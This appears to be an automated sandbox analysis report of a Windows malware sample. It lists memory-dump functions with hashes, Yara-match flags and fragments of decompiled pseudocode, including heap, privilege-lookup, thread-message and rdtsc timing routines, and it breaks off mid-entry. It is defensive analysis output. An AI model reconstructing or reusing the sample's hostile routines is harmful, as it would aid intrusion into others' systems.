                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 108e5999cb72c51347f741a2ed075506c8a99a524d0089bb09fbddb2237a85cb
                                                                        • Instruction ID: aabbc7597ad115f9c254325d8badfc3b3d47d539f28a704642f09a2e415ab475
                                                                        • Opcode Fuzzy Hash: 108e5999cb72c51347f741a2ed075506c8a99a524d0089bb09fbddb2237a85cb
                                                                        • Instruction Fuzzy Hash: 17900261242185526545F15944045074046ABE0681795C012A1405954C86669856E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c38bac9239372d2b784fab8732f9bc7c104f3ee66f53a3a70d1237daa174cd56
                                                                        • Instruction ID: d7cd1ece405de57903b9eafa6a59d1caf68cea3985ad6d65f9fa7fe5aacb9ebd
                                                                        • Opcode Fuzzy Hash: c38bac9239372d2b784fab8732f9bc7c104f3ee66f53a3a70d1237daa174cd56
                                                                        • Instruction Fuzzy Hash: 5690027120114813E111A159450470700499BD0681F95C412A041555CD97968952B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cc6271b03d8ad80b25631ec13edb4a08447dff4ac30f6435697fff47a538312f
                                                                        • Instruction ID: f87f707fc0654558be31e257036e7efe298accf364c22154e994ef6b832f7915
                                                                        • Opcode Fuzzy Hash: cc6271b03d8ad80b25631ec13edb4a08447dff4ac30f6435697fff47a538312f
                                                                        • Instruction Fuzzy Hash: FC90026921314402E180B159540860A00459BD1642F95D415A000655CCCA5588696361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039697A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5fd18a9d784319b69038428239e6553f35f73c149f9135d8de3d6ac36f5f4bd3
                                                                        • Instruction ID: 27fac62de2bfca4fd270cbec5aea56af3f5653e4d707c3acb8f4d77bd58ec0ab
                                                                        • Opcode Fuzzy Hash: 5fd18a9d784319b69038428239e6553f35f73c149f9135d8de3d6ac36f5f4bd3
                                                                        • Instruction Fuzzy Hash: 8D90026130114403E140B15954186064045EBE1741F55D011E0405558CDA5588566262
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6de8a7ff27844657573202cfb2627657be06c15a4aa65a8b8733bfda5eefd061
                                                                        • Instruction ID: 27808fae12208f1908bb1e0872d71948964599b403fe82cf1451dcb722f4b7a9
                                                                        • Opcode Fuzzy Hash: 6de8a7ff27844657573202cfb2627657be06c15a4aa65a8b8733bfda5eefd061
                                                                        • Instruction Fuzzy Hash: 0F90027131128802E110A159840470600459BD1641F55C411A081555CD87D588917162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4aa71b909f89d8dc2ca723d7b3966ebda2cdfe1d544642460abdc1908c39fef5
                                                                        • Instruction ID: 9ce76c5d82073e2c712e34c37c8d6090ce11bf444379d7f3c96c2f45097abbf4
                                                                        • Opcode Fuzzy Hash: 4aa71b909f89d8dc2ca723d7b3966ebda2cdfe1d544642460abdc1908c39fef5
                                                                        • Instruction Fuzzy Hash: 6290027120114802E100A599540864600459BE0741F55D011A5015559EC7A588917171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 926122e3113fd023c0ee8e0b360102a68aa7dae0759a7a080d5d38be3c958647
                                                                        • Instruction ID: 931be5d828a8357e9ccdbdf6b3463a4096404718126acc9e531ea96807ba92d9
                                                                        • Opcode Fuzzy Hash: 926122e3113fd023c0ee8e0b360102a68aa7dae0759a7a080d5d38be3c958647
                                                                        • Instruction Fuzzy Hash: 3A9002712011CC02E110A159840474A00459BD0741F59C411A441565CD87D588917161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5d5d3a1436c7b7d85b7cf7289f690e86e0a25b93646228d54fe9129aa1c42ce1
                                                                        • Instruction ID: a6175ce5e299bfff449e1b2b36412b8a0c00d2f65f592a7747ea605bebbec5fa
                                                                        • Opcode Fuzzy Hash: 5d5d3a1436c7b7d85b7cf7289f690e86e0a25b93646228d54fe9129aa1c42ce1
                                                                        • Instruction Fuzzy Hash: E290027120114C02E180B159440464A00459BD1741F95C015A0016658DCB558A5977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 039695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5977903262a4c37fdf5b4372e3810a479e8ad7f44687a7e54740b0468d32cc41
                                                                        • Instruction ID: db06db18557a0b40791da8f7596e22655dc19b74615beb2f19481fb9f9ff6655
                                                                        • Opcode Fuzzy Hash: 5977903262a4c37fdf5b4372e3810a479e8ad7f44687a7e54740b0468d32cc41
                                                                        • Instruction Fuzzy Hash: 2E9002A1202144035105B1594414616404A9BE0641B55C021E1005594DC66588917165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 0612a9c851b279d244f2324fb53cd543b8c568581c365f97c8d7a49b24771645
                                                                        • Instruction ID: 219c79d35a83652349e67c05d731618f677497924974fd29df6b406c27560ed3
                                                                        • Opcode Fuzzy Hash: 0612a9c851b279d244f2324fb53cd543b8c568581c365f97c8d7a49b24771645
                                                                        • Instruction Fuzzy Hash: 24900475311144031105F55D070450700C7DFD57D1355C031F1007554CD771CC717171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E004088B0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                        0x004088bb
                                                                        0x004088c3
                                                                        0x004088c5
                                                                        0x004088ca
                                                                        0x004088cf
                                                                        0x004088e2
                                                                        0x004088e7
                                                                        0x004088f0
                                                                        0x004088fc
                                                                        0x0040890f
                                                                        0x00408914
                                                                        0x00408917
                                                                        0x00408920
                                                                        0x00408932
                                                                        0x00408937
                                                                        0x0040893c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040893e
                                                                        0x00408942
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00408944
                                                                        0x00000000
                                                                        0x00408942
                                                                        0x00408946
                                                                        0x00408949
                                                                        0x0040894f
                                                                        0x00408951
                                                                        0x0040895c
                                                                        0x00408961
                                                                        0x00408964
                                                                        0x00408971
                                                                        0x0040897c
                                                                        0x0040897e
                                                                        0x00408984
                                                                        0x00408988
                                                                        0x0040898b
                                                                        0x0040898b
                                                                        0x00408992
                                                                        0x00408995
                                                                        0x0040899a
                                                                        0x004089a7
                                                                        0x004088d6
                                                                        0x004088d6
                                                                        0x004088d6

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                        • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184C3, Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitFreeHeapProcess
                                                                        • String ID:
                                                                        • API String ID: 1180424539-0
                                                                        • Opcode ID: 80a1839690273543de32ba5294452d1b84d5d79ead264455f8af8e5acdf43ab0
                                                                        • Instruction ID: 621f0a0e7606a0b5bbac690c6bf820d1e8e6f93a91c8788bd8a574082d101d7e
                                                                        • Opcode Fuzzy Hash: 80a1839690273543de32ba5294452d1b84d5d79ead264455f8af8e5acdf43ab0
                                                                        • Instruction Fuzzy Hash: F2F024B82842417FCB10CF799C40EEB7BA89F95358F05465DF84997243DA31DA16CAA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                        0x00407260
                                                                        0x0040726f
                                                                        0x00407273
                                                                        0x0040727e
                                                                        0x0040728e
                                                                        0x0040729e
                                                                        0x004072a3
                                                                        0x004072aa
                                                                        0x004072ad
                                                                        0x004072ba
                                                                        0x004072bc
                                                                        0x004072be
                                                                        0x004072db
                                                                        0x004072db
                                                                        0x00000000
                                                                        0x004072dd
                                                                        0x004072e2

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                        • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                        • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004186A2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction ID: 6b0ef71fbeaf951b2b192601ca4f65d9d553c49989ddfcc0cd121bd0f41b632b
                                                                        • Opcode Fuzzy Hash: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction Fuzzy Hash: 9EE092361002046FE620EBA89C48DEB776CDF84360F40C959FD1DD7242C536D9548690
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418503, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 27%
                                                                        			E00418503(intOrPtr _a4, int _a8) {
				intOrPtr _v117;
				void* _t16;
				int _t17;
				void* _t18;

				asm("adc esi, eax");
				asm("stosb");
				asm("hlt");
				asm("popad");
				asm("cmc");
				asm("clc");
				_v117 = _v117 - _t16;
				_t12 = _a4;
				E00418DC0(_t18, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t12 + 0xa14)), 0, 0x36);
				_t17 = _a8;
				_push(es);
				ExitProcess(_t17);
			}







                                                                        0x00418503
                                                                        0x00418505
                                                                        0x00418506
                                                                        0x00418507
                                                                        0x0041850d
                                                                        0x0041850e
                                                                        0x0041850f
                                                                        0x00418513
                                                                        0x0041852a
                                                                        0x0041852f
                                                                        0x00418533
                                                                        0x00418538

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: af1e9313bf940d0d5cbf78baa0390432db323990f6fd7632f32c5f1c169f9e6c
                                                                        • Instruction ID: 7612a0f33aa6b85dc941dc66adbce5e7c57cb60b2627193452cc7e97de4f2b44
                                                                        • Opcode Fuzzy Hash: af1e9313bf940d0d5cbf78baa0390432db323990f6fd7632f32c5f1c169f9e6c
                                                                        • Instruction Fuzzy Hash: 17E04F35A002107FD724CF75CC49FD777A8AF59750F158569F909A7282C631AA11CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                        0x004184a7
                                                                        0x004184bd
                                                                        0x004184c1

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16) {
				WCHAR* _t9;
				int _t10;
				WCHAR* _t12;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t9 = _a12;
				_t12 = _a8;
				_push(_a16);
				_t10 = LookupPrivilegeValueW(_t12, _t9, ??); // executed
				return _t10;
			}







                                                                        0x0041864a
                                                                        0x00418652
                                                                        0x00418655
                                                                        0x0041865b
                                                                        0x00418660
                                                                        0x00418664

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E00418510(intOrPtr _a4, int _a8) {
				int _t9;
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _t5 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				_t9 = _a8;
				_push(es);
				ExitProcess(_t9);
			}





                                                                        0x00418513
                                                                        0x0041852a
                                                                        0x0041852f
                                                                        0x00418533
                                                                        0x00418538

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0396967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 450b0ddc31c02040fcff75c0ba190ef58751158cd5e3f9bb4a27aca8c368c535
                                                                        • Instruction ID: 1b662230a92e73243f72f8cef25aac30f153e21756c1618354ba40962780a6a5
                                                                        • Opcode Fuzzy Hash: 450b0ddc31c02040fcff75c0ba190ef58751158cd5e3f9bb4a27aca8c368c535
                                                                        • Instruction Fuzzy Hash: 5CB09B719025C5C5E611E760470871779447BD0745F1AC051D1020645A4778C091F5B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0041581A, Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 56763030843d710986a58f25acea4411a4f91902a0eb6699e7c137fd9d3ac9d8
                                                                        • Instruction ID: a2ec70b76e3044428e3f812f90580699b0032b044476cb899916eb4971d8f47d
                                                                        • Opcode Fuzzy Hash: 56763030843d710986a58f25acea4411a4f91902a0eb6699e7c137fd9d3ac9d8
                                                                        • Instruction Fuzzy Hash: 65E02631D483168AC700DE3DD8C01A0FFF0F902614F403396C980AB112D720E06EC3CA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040C3EA, Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040C3EA(void* __eax, void* __ecx, void* __edi) {

				return __eax;
			}



                                                                        0x0040c3fd

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 759ec3af488aa0e76018513baadbd5b58d62fddc567fd3609b43c8825e07229d
                                                                        • Instruction ID: fb0cead0b4c04b3ea901532f6d15d2301e42e10be854471bd1e7cc3368059846
                                                                        • Opcode Fuzzy Hash: 759ec3af488aa0e76018513baadbd5b58d62fddc567fd3609b43c8825e07229d
                                                                        • Instruction Fuzzy Hash: C7B09227E949050151184C4AB401274F3A4E3C7077A1032BFEE0CF39824E128425058C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0396A3B0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f74e471630732bbe91e42b6eb12f4d3784b38df302d116c2bddecde91326cfce
                                                                        • Instruction ID: 1ff8c891469b7e2b234e308124de7adcf6208c02cb287e74bf175d0361c832a9
                                                                        • Opcode Fuzzy Hash: f74e471630732bbe91e42b6eb12f4d3784b38df302d116c2bddecde91326cfce
                                                                        • Instruction Fuzzy Hash: 4C90027120158402E140B159844460B5045ABE0741F55C411E0416558C87558856A261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969B00, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.278585391.0000000003900000.00000040.00000001.sdmp, Offset: 03900000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 418916a2f40b4a50faa2635102f445ce52eced89e1b3191af616e0cdb26b462e
                                                                        • Instruction ID: 3bc0c3d255e4c6f872eaaaa35ec8245907cac8683e5543b33938dd533257f589
                                                                        • Opcode Fuzzy Hash: 418916a2f40b4a50faa2635102f445ce52eced89e1b3191af616e0cdb26b462e
                                                                        • Instruction Fuzzy Hash: 7F90026124114C02E140B15984147070046DBD0A41F55C011A0015558D8756896576F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03969A80, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
